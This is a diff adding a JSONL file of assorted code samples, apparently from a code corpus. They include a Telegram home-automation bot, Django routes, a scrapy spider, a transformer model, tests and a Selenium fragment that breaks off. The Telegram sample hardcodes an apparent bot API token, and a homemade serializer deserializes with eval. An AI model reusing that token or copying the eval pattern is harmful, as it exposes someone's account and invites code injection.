diff --git "a/3074.jsonl" "b/3074.jsonl" new file mode 100644--- /dev/null +++ "b/3074.jsonl" @@ -0,0 +1,660 @@ +{"seq_id":"311699496","text":"from Adafruit_IO import Client #importing adafruit library\nfrom telegram.ext import Updater,MessageHandler,Filters #importing telegram libraries\nimport os #import os to get hidden keys\nimport random\n#get feed key of adafruit feed\nfeed_key = os.getenv('feed_key') \n#creating a client\naio = Client('uvi', feed_key) \n\n\n#lists \ngreeting = [\"hi\",\"hello\",\"hey\"]\ntay = [\"what can you do?\",\"what will you do?\",\"say about yourself\"]\nhowlist = [\"how are you?\",\"how are you\"]\nfinelist = [\"fine\",\"great\",\"good\"]\nlight_on = [\"turn on the light\",\"turn on light\",\"lights on\",\"light on\",\"its dark here\",\"on the light\"]\nlight_off = [\"turn off the light\",\"turn off light\",\"lights off\",\"light off\"]\nfan_on = [\"turn on the fan\",\"turn on fan\",\"fan on\",\"on the fan\"]\nfan_off = [\"turn off the fan\",\"turn off fan\",\"fan off\",\"off the fan\"]\n\n#to make the light ON\ndef ledon(bot,update):\n chat_id = bot.message.chat_id\n animation_url = 'https://media.baamboozle.com/uploads/images/68811/1618179100_34871_gif-url.gif'\n bot.message.reply_text(\"Done,lights turned on!✌\")\n update.bot.sendAnimation(chat_id=chat_id,animation=animation_url,duration=2)\n aio.send('led', 1)\n\n#to make the light OFF\ndef ledoff(bot,update):\n chat_id = bot.message.chat_id\n path='https://labblog.uofmhealth.org/sites/lab/files/2018-11/michigan-med-l-ocd-study.gif'\n bot.message.reply_text(\"Done,lights turned off!👍\")\n update.bot.sendAnimation(chat_id=chat_id,animation=path)\n aio.send('led', 0)\n\n#make fan ON\ndef fanon(bot,update):\n chat_id = bot.message.chat_id\n path='https://mir-s3-cdn-cf.behance.net/project_modules/disp/bafb3929035897.55decb26f207b.gif'\n bot.message.reply_text(\"Done,fan turned on!✌\")\n update.bot.sendAnimation(chat_id=chat_id,animation=path)\n aio.send('fan', 1)\n\n#make fan OFF\ndef fanoff(bot,update):\n chat_id = bot.message.chat_id\n path='https://d1j8pt39hxlh3d.cloudfront.net/uploads/thumbs_up_sign_256_1.gif'\n bot.message.reply_text(\"Done,fan turned off!\")\n update.bot.sendAnimation(chat_id=chat_id,animation=path)\n aio.send('fan', 0)\n\n#to get the status of light\ndef lightOnorOff(bot,update):\n feedLight = aio.receive('led')\n if(feedLight.value=='1'):\n bot.message.reply_text(\"ON\")\n else:\n bot.message.reply_text(\"OFF\")\n print(feedLight.value)\n \n#get status of fan \ndef fanOnorOff(bot,update):\n feedFan = aio.receive('fan')\n if(feedFan.value=='1'):\n bot.message.reply_text(\"ON\")\n else:\n bot.message.reply_text(\"OFF\")\n print(feedFan.value)\n \n#for invalid commands \ndef inval(bot,update): \n bot.message.reply_text(\"Invalid command!\")\n\n#greeting \ndef greet(bot,update):\n bot.message.reply_text(\"👋Hi!.. 
You can give me commands to turn ON or OFF the light or fan and also to get status of light and fan.\")\n \n \n#about the bot \ndef about(bot,update):\n bot.message.reply_text(\"I can turn on and off the light and fan for you\")\n\ndef fine(bot,update):\n mes = random.choice(finelist)\n bot.message.reply_text(mes)\n\ndef ok(bot,update):\n bot.message.reply_text(\"Okay!\")\n\n \n\ndef main(bot,update):\n a = bot.message.text.lower()\n print(a)\n if a in light_on:\n ledon(bot,update)\n elif a in light_off:\n ledoff(bot,update)\n elif a in fan_on:\n fanon(bot,update)\n elif a in fan_off:\n fanoff(bot,update)\n elif a in greeting:\n greet(bot,update)\n elif a in tay:\n about(bot,update)\n elif a in howlist:\n fine(bot,update)\n elif a == \"ok\" or a==\"okay\":\n ok(bot,update)\n elif a == \"light status\":\n lightOnorOff(bot,update)\n elif a == \"fan status\":\n fanOnorOff(bot,update)\n else:\n inval(bot,update)\n\nBOT_TOKEN = '1890518768:AAEidn93bZoXoQOl6wJWawizl0iCZ4N3p2k'\nup = Updater(BOT_TOKEN,use_context=True)\ndp = up.dispatcher\ndp.add_handler(MessageHandler(Filters.text,main))\nup.start_polling()\nup.idle()\n","sub_path":"telebotpy.py","file_name":"telebotpy.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"384374991","text":"\n\nfrom xai.brain.wordbase.nouns._plait import _PLAIT\n\n#calss header\nclass _PLAITING(_PLAIT, ):\n\tdef __init__(self,): \n\t\t_PLAIT.__init__(self)\n\t\tself.name = \"PLAITING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"plait\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_plaiting.py","file_name":"_plaiting.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"524034453","text":"unsortedlist = open(\"unsortedlist.txt\", \"r\")\nunsortedlistarr = unsortedlist.readlines()\nunsortedlist.close()\nuserlistparsed = set(unsortedlistarr)\nuserlistdiscrimorder = sorted(userlistparsed, key=lambda x: int(x.rsplit('#',1)[1]))\nuserfile = open('userlist.txt', 'w+')\nfor user in userlistdiscrimorder:\n try:\n userfile.write(user)\n except:\n print(\"User write error!\")","sub_path":"sortunsortedlist.py","file_name":"sortunsortedlist.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264469253","text":"from django.urls import path\nfrom .views import registroProducto,listarProducto,editarProducto,eliminarProducto\nfrom .views import registroCliente,listarClientes,editarCliente,eliminarCliente,Inicio\nfrom django.contrib.auth.decorators import login_required\n\nurlpatterns = [\n path('Inicio',Inicio.as_view(), name = 'index'),\n path('registro_producto/',(registroProducto), name = 'registro_producto'),\n path('listar_producto/',(listarProducto.as_view()), name = 'listar_producto'),\n path('editar_producto/',(editarProducto), name = 'editar_producto'),\n path('eliminar_producto/',(eliminarProducto), name = 'eliminar_producto'),\n path('registro_cliente/',(registroCliente), name = 'registro_cliente'),\n path('listar_cliente/',(listarClientes), name = 'listar_cliente'),\n path('editar_cliente/',(editarCliente), name = 'editar_cliente'),\n path('eliminar_cliente/',(eliminarCliente), name = 
'eliminar_cliente')\n]\n","sub_path":"inventario/apps/producto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"73378221","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 7 21:40:19 2019\n\n@author: Brodie\n\nA list of changable parameters for use with labeling. A description of each\nis before it.\n\"\"\"\n\n# =============================================================================\n\"\"\"\nAll these paths and folders should exist from the git, if not, please create\n them. Or, change them here.\n\"\"\"\nimages_path = './data_per/image/'\n# Images to do, it will cycle through these\ndone_im_pat = './data_per/im_done/'\n# After images have a npy file made, they will be moved here move them\n# back to images_path if you would like to redo them\nresult_path = './data_per/label/'\n# Where you want label image to go\ncompar_path = './data_per/comparison/'\n# Where you want to comparison plots\nmatlab_path = './data_per/matFile/'\n# Where you want to keep the matlab files\nreport_path = './data_per/report/'\n# Where you want the reports\nunsplit_pat = './data_per/im_to_do/unsplit/'\n# If the image is too big, it will be split up, where would you like to\n# save the original?\nden_lat_pat = './data_per/dense_later/'\n# If you choose to do the crf later where would you like the\n# npy files saved?\nimage_types = [images_path + '*.TIF', images_path + '*.tif',\n images_path + '*.tiff',\n images_path + '*.JPG', images_path + '*.jpg',\n images_path + '*.jpeg', images_path + '*.JPEG',\n images_path + '*.png', images_path + '*.PNG'\n ]\n# List of image types to look for\n\n# =============================================================================\n\"\"\"\nSet these for the drawing GUI\n\"\"\"\nmax_x_steps = 2\nmax_y_steps = 2\nref_im_scale = .9\n# scale down the whole image for viewing use 1 if your\n# image fits on your screen\n# TODO: I don't think this is being used properly\nlw = 5\n# Initial line width\nim_order = 'RGB'\n# Some tif images are in BGR others are RGB\n# -options are: 'BGR', 'RGB'\n\n# =============================================================================\n\"\"\"\nTo change how the results are output.\n\"\"\"\na_label = 'a) Input'\n# What to label the left image\nb_label = 'b) CRF prediction'\n# What to label the middle image, or right image if doing 2\nplot_c = False\n# Do you want to plot your markings?\nc_label = 'b) Labels'\n# What to label the right image\nfont_size = 6\n# Font size for results images\nalpha_percent = 0.4\n# How see through the results should be (0-1)\nclasses = {'Person': '#FF0000',\n 'BackGround': '#329ba7'}\n# Set classes and colors here\nauto_class = \"No\"\n# Do you have a class that will be ignored by the machine learning? Like,\n# Shadow, or BackGround? In some cases all pixels in a small frame are 0,\n# and it will automatically set those to the throw away class name. If you\n# do not have one, set this to \"No\"\n\n# =============================================================================\n\"\"\"\nThese parameters are for the CRF. You will likely not want to change these.\nThey work well with any images I have tried for this purpose. 
Although some\ncan be learned and a good project would be writing a machine learning node\nto learn what works best.\n\"\"\"\ntheta = 60\n# \"nearness\" tolerance\nn_iter = 100\n# \"intensity\" tolerance\ncompat_col = 40\nscale = 5\nprob = 0.5\ndo_dense_later = False\n# If you get into a groove and just want to label for a while, you\n# can save off the labels to do the dense CRF portion later\n\n# =============================================================================\n\"\"\"\nIf you are doing a gray-scale image, sometimes it is best\nto look at it with a different colormap. Other optins found at:\n https://matplotlib.org/tutorials/colors/colormaps.html\n\"\"\"\nc_map = 'gray'\n\n# =============================================================================\n\"\"\"\nThis just puts it all in one place. No need to edit this unless you add or\n subtract a whole parameter above.\n\"\"\"\nparams = {'images_path': images_path,\n 'done_im_pat': done_im_pat,\n 'result_path': result_path,\n 'compar_path': compar_path,\n 'matlab_path': matlab_path,\n 'report_path': report_path,\n 'unsplit_pat': unsplit_pat,\n 'den_lat_pat': den_lat_pat,\n 'image_types': image_types,\n 'max_x_steps': max_x_steps,\n 'max_y_steps': max_y_steps,\n 'ref_im_scale': ref_im_scale,\n 'lw': lw,\n 'im_order': im_order,\n 'a_label': a_label,\n 'b_label': b_label,\n 'plot_c': plot_c,\n 'c_label': c_label,\n 'font_size': font_size,\n 'alpha_percent': alpha_percent,\n 'classes': classes,\n 'auto_class': auto_class,\n 'theta': theta,\n 'n_iter': n_iter,\n 'compat_col': compat_col,\n 'scale': scale,\n 'prob': prob,\n 'do_dense_later': do_dense_later,\n 'c_map': c_map}\n","sub_path":"create_groundtruth/modules/params_per.py","file_name":"params_per.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98303177","text":"\"\"\"Define the module to test `date_utils`.\"\"\"\nimport datetime\nimport pytest\n\nfrom scrapd.core import date_utils\n\n\n@pytest.mark.parametrize('current,from_,to,expected', [\n ('Jan 10', 'Jan 1', 'Jan 31', True),\n ('Jan 1', None, None, True),\n])\ndef test_is_in_range_00(current, from_, to, expected):\n \"\"\"Ensure a date is in range.\"\"\"\n assert date_utils.is_in_range(current, from_, to) == expected\n\n\n@pytest.mark.parametrize('date, default, settings, expected', [\n ('Jan 1 2019', None, None, datetime.datetime(2019, 1, 1, 0, 0)),\n ('Not a date', datetime.datetime.min, None, datetime.datetime(1, 1, 1, 0, 0)),\n])\ndef test_parse_date_00(date, default, settings, expected):\n \"\"\"Ensure a parsed date returns a value.\"\"\"\n assert date_utils.parse_date(date, default=default, settings=settings) == expected\n\n\ndef test_parse_date_01():\n \"\"\"Ensure an invalid date with no default raises an exception.\"\"\"\n with pytest.raises(Exception):\n date_utils.parse_date('Not a date')\n\n\n@pytest.mark.parametrize('date, expected', [\n ('Jan 10 2019', '01/10/2019'),\n ('2019-01-10', '01/10/2019'),\n])\ndef test_clean_date_string_00(date, expected):\n \"\"\"Ensure date string is properly formatted.\"\"\"\n assert date_utils.clean_date_string(date) == expected\n","sub_path":"tests/core/test_date_utils.py","file_name":"test_date_utils.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"225570504","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nimport redis\nfrom scrapy_redis.spiders import RedisSpider\nfrom 
..items.items import MyCrawlerItem\nfrom ..util import url_cleaning\nfrom ..settings import REDIS_URL,BOT_NAME\nfrom scrapy import Request\nfrom ..util.get_proxy import get_proxy\n\nimport sys,threading\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\nclass test_spider(RedisSpider):\n\n name = \"mycrawler\"\n # download_delay = 2\n\n # start_urls = [r\"https://taobao.com\"]\n # custom_settings = #在爬虫运行时覆盖来自settings的设置\n\n # redis_key = 'mycrawler:start_urls' #redis中要有主键为mycrawler:start_urls的list,没有的话爬虫只能监听等待\n\n def __init__(self, name=None, **kwargs):\n if name is not None:\n self.name = name\n elif not getattr(self, 'name', None):\n raise ValueError(\"%s must have a name\" % type(self).__name__)\n self.__dict__.update(kwargs)\n if not hasattr(self, 'start_urls'):\n self.start_urls = []\n\n #开个线程,不断获取proxy\n self.get_proxy_threading = threading.Thread(target=get_proxy,args=())\n self.get_proxy_threading.setDaemon(True)\n self.get_proxy_threading.start()\n\n self.server = redis.StrictRedis.from_url(REDIS_URL)\n\n # if kwargs:\n # #DONE 初始start_urls加入爬取队列:\n # self.json = eval(kwargs[\"json\"])\n # self.start_server = redis.StrictRedis.from_url(REDIS_URL)\n # for task in self.json.keys():\n # self.start_server.lpush('%s:start_urls'%BOT_NAME,task)\n\n # def make_requests_from_url(self, url):\n # return get_message_from_json(url,self.json)\n\n def parse(self, response):\n\n # DONE 抽取该页新的url并清洗\n body = response.body\n pattern = re.compile(r'href=\\\".*?\\\"',re.M)\n urls = pattern.findall(body)\n urls = url_cleaning.all_url_cleaning(self.server,response,urls)\n # print 'haha'\n item = MyCrawlerItem()\n item['url'] = response.url\n item['id'] = response.meta[\"id\"]\n\n this_task_information = eval(self.server.hget('%s:task_information' % BOT_NAME, response.meta[\"id\"]))\n\n\n # DONE 新闻博客类抽取整页\n if this_task_information[\"type\"] == 0:\n item['type'] = 0\n item['content'] = body.decode(\"unicode_escape\")\n\n # DONE 电商类抽取部分结构化好的商品信息\n elif this_task_information[\"type\"] == 1 and response.meta.has_key('fetcheditemcontents'):\n item['type'] = 1\n item['content'] = response.meta[\"fetcheditemcontents\"]\n #未识别类型\n else:\n item['type'] = -1\n item['content'] = ''\n\n yield item\n\n\n #DONE 将符合条件的链接加到待爬取队列中去,传递meta\n for url in urls:\n if this_task_information[\"type\"] == 1:\n this_url_priority = this_task_information[\"priority\"]\n this_url_rule = ''\n\n # 识别特殊页面,设置优先级和\n if this_task_information.has_key(\"rules\") and this_task_information[\"rules\"]:\n for rule in this_task_information[\"rules\"].keys():\n if re.compile(rule).match(url):\n this_url_rule = rule\n # 详情页,优先级增加\n this_url_priority += 1\n\n # meta中共两项:id、this_url_rule\n clean_meta = {}\n clean_meta[\"id\"] = response.meta[\"id\"]\n clean_meta[\"this_url_rule\"] = this_url_rule\n yield Request(url, priority=this_url_priority, meta=clean_meta)\n else:\n # meta中共一项:id\n yield Request(url, priority=this_task_information[\"priority\"], meta=response.meta)","sub_path":"mycrawler/spiders/test_spider.py","file_name":"test_spider.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"125064079","text":"def fib(n, memo):\r\n if n in memo:\r\n return memo[n]\r\n if n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n else:\r\n memo[n] = fib(n-1, memo) + fib(n-2, memo)\r\n return memo[n]\r\n\r\ndef main():\r\n for n in range(2, 35):\r\n memo = {} #store the value of fib in a dictionary to remember the value so then can access that value and 
not have to calculate it everytime\r\n print(n, fib(n, memo))\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"week5/fast_fib.py","file_name":"fast_fib.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"43622350","text":"class my_class():\n def __init__(self, s):\n self.c = s\n self.s = s+s\n class my_class2():\n se = 23\n a = 1\n b = \"mfksdkfs\"\n d = 'hhh'\n def pr(self):\n print('a = ', self.a, ' b = ', self.b, ' c = ', self.c)\n self.c = self.a\n self.a = self.s # a stanovitsa attributom\n print('a = ', self.a, ' b = ', self.b, ' c = ', self.c)\ndef foo():\n return None\n\nprint(my_class.my_class2)\nprint('name = '+str(my_class.__name__))\nprint(\"just class \")\nprint('name = '+str(foo.__qualname__))\nprint(\"just func \")\nprint(my_class.pr)\nasd = eval(str(my_class.pr.__qualname__))\nprint(asd)\nprint(eval('''foo'''))\n\n##\n# list serlzr & de_srlzr\n# add type and str in return dict\n\n# TODO ADD global local\n# TODO Git\ndef make_lines_from_collection(collection):\n dump_obj = make_corrent_dumps(\n make_correct_and_str_dict(collection),\n collection)\n return dump_obj\n\ndef make_correct_and_str_dict(obj):\n # correct_values = []\n # str_values = []\n correct_and_str = {'correct_values': [], 'str_values': []}\n if type(obj).__name__ == 'dict':\n keys = obj.keys()\n values = obj.values()\n for i in keys:\n print(str(i) + ' ' + type(i).__name__)\n\n if type(i).__name__ == 'type':\n print('+++++++++++++++++++++TYPE+++++++++++')\n\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n elif type(i).__name__ == 'function':\n print('+++++++++++++++++++++function+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n if (type(i).__name__ == 'tuple'\n or type(i).__name__ == 'list'\n or type(i).__name__ == 'dict'\n or type(i).__name__ == 'set'):\n print('__________1111_________-to_str_objInObj(__________')\n tmp = make_correct_and_str_dict(i)\n correct_and_str['correct_values'] += tmp['correct_values']\n correct_and_str['str_values'] += tmp['str_values']\n\n\n for i in values:\n print(type(i).__name__)\n\n if type(i).__name__ == 'type':\n print('+++++++++++++++++++++TYPE+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n if type(i).__name__ == 'function':\n print('+++++++++++++++++++++function+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n if (type(i).__name__ == 'tuple'\n or type(i).__name__ == 'list'\n or type(i).__name__ == 'dict'\n or type(i).__name__ == 'set'):\n print('___________________-222to_str_objInObj(__________')\n tmp = make_correct_and_str_dict(i)\n correct_and_str['correct_values'] += tmp['correct_values']\n correct_and_str['str_values'] += tmp['str_values']\n\n\n\n else:\n for i in obj:\n print( type(i).__name__)\n\n if type(i).__name__ == 'type':\n print('+++++++++++++++++++++TYPE+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n if type(i).__name__ == 'function':\n print('+++++++++++++++++++++function+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n if (type(i).__name__ == 'tuple'\n or type(i).__name__ == 'list'\n or type(i).__name__ == 'dict'\n or 
type(i).__name__ == 'set'):\n print('___________________-to_str_objInObj(__________')\n tmp = make_correct_and_str_dict(i)\n correct_and_str['correct_values'] += tmp['correct_values']\n correct_and_str['str_values'] += tmp['str_values']\n return correct_and_str\n\ndef make_corrent_dumps(corrent_and_str, obj):\n str_values = corrent_and_str['str_values']\n correct_values = corrent_and_str['correct_values']\n lines = str(obj)\n\n print('str_ vall' + str(str_values))\n for i in range(len(str_values)):\n splt = lines.split(str_values[i], 1)\n if len(splt) > 1:\n lines = splt[0] + correct_values[i] + splt[1]\n print(type(lines))\n print(lines+'\\n\\n\\n')\n return {'type': type(obj).__name__, 'lines': lines}\n\ndef dumps_listt(value):\n dump_obj = {'type': type(value).__name__, 'lines': str(value)}\n\n if (dump_obj['type'] == 'tuple'\n or dump_obj['type'] == 'list'\n or dump_obj['type'] == 'dict'\n or dump_obj['type'] == 'set'):\n dump_obj = make_lines_from_collection(value)\n\n return dump_obj\n\ndef loads_listt(dump_obj):\n # if dump_obj['type'] == 'tuple' \\\n # or dump_obj['type'] == 'list' \\\n # or dump_obj['type'] == 'dict':\n # obj\n print(dump_obj)\n if dump_obj['type'] == 'str':\n return str(eval(dump_obj['lines']))\n else:\n return eval(dump_obj['lines'])\n\n\n\n\n##\na = ['9999', \"5555\", 123, {'o': 'ok', 's': 1233}]\n\nev = loads_listt(dumps_listt(a))\n\nfor i in range(len(ev)):\n print(type(a[i]).__name__ + ' . ' + type(ev[i]).__name__ + ' = ' + str(ev[i]))\n\nq = ev[3]\nq = loads_listt(dumps_listt(q))\nprint(type(q).__name__+str(q))\nprint(type(q['o']).__name__ + str(q['o']))\nprint(type(q['s']).__name__ + str(q['s']))\nprint('all is ok\\n')\n\n##\n\nsett = {1, 2, 3, 1, 2, 4}\na = 1\naa = 1.1\ns = '2'\nd = {'3': 3, '4': {'1': [1, 2, 3]}, foo: my_class}\nf = [my_class, 'www', [12, 34]]\ng = ('asdasd', my_class, 33.3, {1, 2, 3, 1, 2, 4, my_class})\n\nfff = loads_listt(dumps_listt(a))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(aa))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(s))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(g))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(f))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(d))\nprint(type(fff).__name__ + ' ' + str(fff))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##\n\ndef dumps_int(obj):\n return str(obj)\ndef dumps_float(obj):\n return str(obj)\ndef dumps_list(obj):\n d = {}\n for l in obj:\n type_l = type(l).__name__\n if type_l != 'str':\n l = funk[type_l](l)\n d.update(type_l)\n # str = '{'\n # for l in obj:\n # str = str + 'type: ' + type(l).__name__\n # if type(l).__name__!= 'str':\n # l = funk[type(l).__name__](l)\n # str = str + l + ', '\n # str = str[:-2] + '}'\n return str\n\n\n\ndef dumps_dict(obj):\n keys = []\n for key in obj:\n if type(key).__name__ == 'int':\n key = dumps_int(key)\n keys.append({'type': type(key).__name__, 'key': key})\n print(keys)\n values = []\n for key in keys:\n values.append(obj[key])\n print(values)\n\n\nfunk = {'int': dumps_int, 'float': dumps_float, 'list': dumps_list}\n\nprint(dumps_list(f))\n\n# dumps_dict(d)\n#\n# def dumps_a(obj):\n# print(type(obj))\n#\n# tp = type(obj).__name__\n# # s = str['str']\n# if tp == 'int':\n# s = str(obj)\n# elif tp == 'float':\n# s = str(obj)\n# elif tp == 'str':\n# s = obj\n# elif tp == 'dict':\n# dump_dict(obj)\n#\n# return 'DOpis dict'\n# elif tp == 'list':\n#\n# elif tp == 'tuple':\n# elif tp == 'byte':\n# elif 
tp == 'NoneType':\n#\n#\n# dump = {'type':type(obj).__name__,'str':str(obj)}\n# print(dump)\n# return dump\n#\n# def loads_a(str):\n# print(str)\n# tp = str['type']\n# s = str['str']\n# if tp == 'int':\n# return int(s)\n# elif tp == 'float':\n# return float(s)\n# elif tp == 'str':\n# return s\n# elif tp == 'dict':\n# return 'DOpis dict'\n# elif tp == 'list':\n#\n# elif tp == 'tuple':\n# elif tp == 'byte':\n# elif tp == 'NoneType':","sub_path":"test/left.py","file_name":"left.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"189458980","text":"from torch import nn\nfrom layers import *\n\nimport torch\nimport math\nimport numpy as np\nimport random\n\n\nclass ReCoSaTransformer(nn.Module):\n def __init__(self, config, embedding=None):\n super().__init__()\n \n # Seed fixing\n np.random.seed(777)\n torch.manual_seed(777)\n torch.cuda.manual_seed_all(777)\n random.seed(777)\n \n self.config = config\n self.use_gpt = False\n if embedding is not None:\n self.use_gpt = True\n \n # Embedding components\n if self.use_gpt:\n self.embedding = embedding # GPT2 word embedding layer\n self.embedding_linear = nn.Linear(self.embedding.embedding_dim, self.config['d_model'])\n else:\n self.embedding = nn.Embedding(self.config['vocab_size'], self.config['d_model'])\n self.word_pembedding = PositionalEncoder(self.config['max_len'], self.config['d_model'], self.config['device'])\n self.time_pembedding = PositionalEncoder(self.config['max_time'], self.config['d_model'], self.config['device'])\n \n # Word Level LSTM components\n self.word_level_rnn = nn.GRU(\n input_size=self.config['d_model'],\n hidden_size=self.config['hidden_size'],\n num_layers=self.config['gru_num_layers'],\n dropout=(0.0 if self.config['gru_num_layers'] == 1 else self.config['gru_dropout']),\n batch_first=True,\n )\n \n # Encoder & Decoder\n self.encoder = Encoder(\n self.config['hidden_size'] + self.config['d_model'], \n self.config['d_ff'], \n self.config['num_heads'], \n self.config['dropout'], \n self.config['encoder_num_layers']\n )\n self.decoder = Decoder(\n self.config['hidden_size'] + self.config['d_model'], \n self.config['d_ff'], \n self.config['num_heads'], \n self.config['dropout'], \n self.config['decoder_num_layers']\n )\n \n self.output_linear = nn.Linear(self.config['hidden_size'] + self.config['d_model'], self.config['vocab_size'])\n self.softmax = nn.LogSoftmax(dim=-1)\n \n \n def init_model(self): \n # Initialize parameters\n for param in self.parameters():\n if param.dim() > 1:\n nn.init.xavier_uniform_(param)\n \n def forward(self, src_input, trg_input, e_mask, d_mask):\n # Embeddings & Masking\n src_emb = self.src_embed(src_input) # (B, T, 2*d_model)\n trg_emb = self.trg_embed(trg_input) # (B, L, 2*d_model)\n \n # Encoding phase\n e_output = self.encoder(src_emb, e_mask) # (B, T, 2*d_model)\n \n # Decoding phase\n d_output = self.decoder(trg_emb, e_output, e_mask, d_mask) # (B, L, 2*d_model)\n \n output = self.softmax(self.output_linear(d_output)) # (B, L, vocab_size)\n \n return output # (B, L, vocab_size)\n \n def src_embed(self, src_input):\n src_emb = self.embedding(src_input) # (B, T, L, d_model)\n if self.use_gpt:\n src_emb = self.embedding_linear(src_emb) # (B, T, L, d_model)\n max_len, d_model = src_emb.shape[2], src_emb.shape[3]\n last_hiddens = self.word_level_rnn(src_emb.view(-1, max_len, d_model))[1][-1] # (B*T, d_model)\n \n batch_size = src_emb.shape[0]\n src_emb = last_hiddens.view(batch_size, -1, 
d_model) # (B, T, d_model)\n src_emb = self.time_pembedding(src_emb, cal='concat') # (B, T, 2*d_model)\n \n return src_emb # (B, T, 2*d_model)\n \n def trg_embed(self, trg_input):\n trg_emb = self.embedding(trg_input) # (B, L, d_model)\n if self.use_gpt:\n trg_emb = self.embedding_linear(trg_emb) # (B, L, d_model)\n trg_emb = self.word_pembedding(trg_emb, cal='concat') # (B, L, 2*d_model)\n \n return trg_emb # (B, L, 2*d_model)\n\n \nclass Encoder(nn.Module):\n def __init__(self, d_model, d_ff, num_heads, dropout, num_layers):\n super().__init__()\n self.d_model = d_model\n self.d_ff = d_ff\n self.num_heads = num_heads\n self.dropout = dropout\n self.num_layers = num_layers\n \n self.layers = nn.ModuleList([EncoderLayer(self.d_model, self.d_ff, self.num_heads, self.dropout) for i in range(self.num_layers)])\n self.layer_norm = LayerNormalization(self.d_model)\n\n def forward(self, x, e_mask):\n for i in range(self.num_layers):\n x = self.layers[i](x, e_mask)\n\n return self.layer_norm(x)\n\n\nclass Decoder(nn.Module):\n def __init__(self, d_model, d_ff, num_heads, dropout, num_layers):\n super().__init__()\n self.d_model = d_model\n self.d_ff = d_ff\n self.num_heads = num_heads\n self.dropout = dropout\n self.num_layers = num_layers\n \n self.layers = nn.ModuleList([DecoderLayer(self.d_model, self.d_ff, self.num_heads, self.dropout) for i in range(self.num_layers)])\n self.layer_norm = LayerNormalization(self.d_model)\n\n def forward(self, x, e_output, e_mask, d_mask):\n for i in range(self.num_layers):\n x = self.layers[i](x, e_output, e_mask, d_mask)\n\n return self.layer_norm(x) \n","sub_path":"src/recosa_transformer.py","file_name":"recosa_transformer.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98178352","text":"from optparse import make_option\n\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Q\n\nfrom ...models import Activity, Workflow\nfrom ...proxy.swf import get_activities, get_workflows\n\n\nclass Command(BaseCommand):\n\n option_list = BaseCommand.option_list + (\n make_option(\n '--aws-access-key',\n dest='aws_access_key'\n ),\n make_option(\n '--aws-secret-key',\n dest='aws_secret_key'\n ),\n make_option(\n '--swf-domain',\n dest='swf_domain'\n )\n )\n\n def handle(self, args, options):\n activities = get_activities((options['aws_access_key'],\n options['aws_secret_key']),\n options['swf_domain'])\n _sync_tasks(Activity, activities)\n workflows = get_workflows((options['aws_access_key'],\n options['aws_secret_key']),\n options['swf_domain'])\n _sync_tasks(Workflow, workflows)\n\n\ndef _sync_tasks(TaskClass, remote_tasks):\n remote_tasks = set(remote_tasks)\n local_tasks = set(TaskClass.objects.all())\n tasks_to_delete = local_tasks - remote_tasks\n TaskClass.objects.filter(pk__in=[e.pk for e in tasks_to_delete]).delete()\n tasks_to_add = remote_tasks - local_tasks\n TaskClass.objects.bulk_create(tasks_to_add)\n","sub_path":"djdew/management/commands/sync_task_types.py","file_name":"sync_task_types.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264854764","text":"# \n# this is testing purpose for webdriver\n#\n# Ref: \n# http://selenium-python.readthedocs.io/getting-started.html\n# \n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.keys import 
